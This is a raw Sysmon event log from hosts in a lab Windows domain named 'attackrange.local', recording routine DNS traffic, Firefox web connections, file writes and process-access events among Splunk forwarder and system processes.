AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64555- 354300x8000000000000000105660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.155{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57976- 354300x8000000000000000105659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.155{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63913- 354300x8000000000000000105658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.155{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59761- 354300x8000000000000000105657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.154{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51527- 354300x8000000000000000105656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.154{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60719- 354300x8000000000000000105655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.154{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52740- 354300x8000000000000000105654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.154{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64170- 354300x8000000000000000105653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.154{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60401- 354300x8000000000000000105652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.153{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57974- 354300x8000000000000000105651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.153{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61732- 354300x8000000000000000105650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.149{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51771-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.128{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51770-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.052{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51769-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 23542300x8000000000000000105647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.013{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:35.060{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51788-false142.250.186.163fra24s08-in-f3.1e100.net80http 354300x8000000000000000105718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:35.034{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64338-false142.250.184.196fra24s11-in-f4.1e100.net443https 354300x8000000000000000105717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.987{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51787-false142.250.186.163fra24s08-in-f3.1e100.net80http 354300x8000000000000000105716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.986{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64337- 354300x8000000000000000105715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.986{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51631- 354300x8000000000000000105714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.983{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50031- 354300x8000000000000000105713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.962{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51786-false142.250.184.196fra24s11-in-f4.1e100.net443https 354300x8000000000000000105712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.962{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50150- 354300x8000000000000000105711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.959{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61523- 354300x8000000000000000105710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.450{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-56073-true2001:500:a8:0:0:0:0:e-53domain 354300x8000000000000000105709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.205{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62035- 354300x8000000000000000105708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.205{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60353- 22542200x8000000000000000105707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.968{58E9C193-B422-615A-0602-00000000FC01}5552www.google.com02a00:1450:4001:831::2004;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.967{58E9C193-B422-615A-0602-00000000FC01}5552www.google.com0142.250.184.196;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.966{58E9C193-B422-615A-0602-00000000FC01}5552www.google.com0::ffff:142.250.184.196;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:35.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A43DAF599131A6B98EF90B981FA7C6,SHA256=D849AE5BF4899B984820CB8E9F8917877003B6C4A9864E1394E5F76CF061C368,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082869Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.761{2FDD8D40-B42B-615A-7E01-00000000FD01}36122232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082868Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B42B-615A-7E01-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082867Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082866Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082865Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082864Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082863Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082862Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082861Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082860Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082859Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082858Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B42B-615A-7E01-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082857Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.620{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B42B-615A-7E01-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082856Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.621{2FDD8D40-B42B-615A-7E01-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082855Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57A7BCF95409241103783363FE0F41E1,SHA256=A5173314E73BCAF26ED3E14AA7B1500733B75898B55161015EE761E1FFF2B7F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082854Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:35.370{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4ED63381D3C932F0A3B87D0E4D8AF6C,SHA256=27A6855B1B6E1E26D9C10EFA255C0B4B713420171DFACBC199824D066EB31B15,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.174{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62035- 354300x8000000000000000105702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.171{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60353- 10341000x800000000000000082885Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.765{2FDD8D40-B42C-615A-7F01-00000000FD01}36682668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 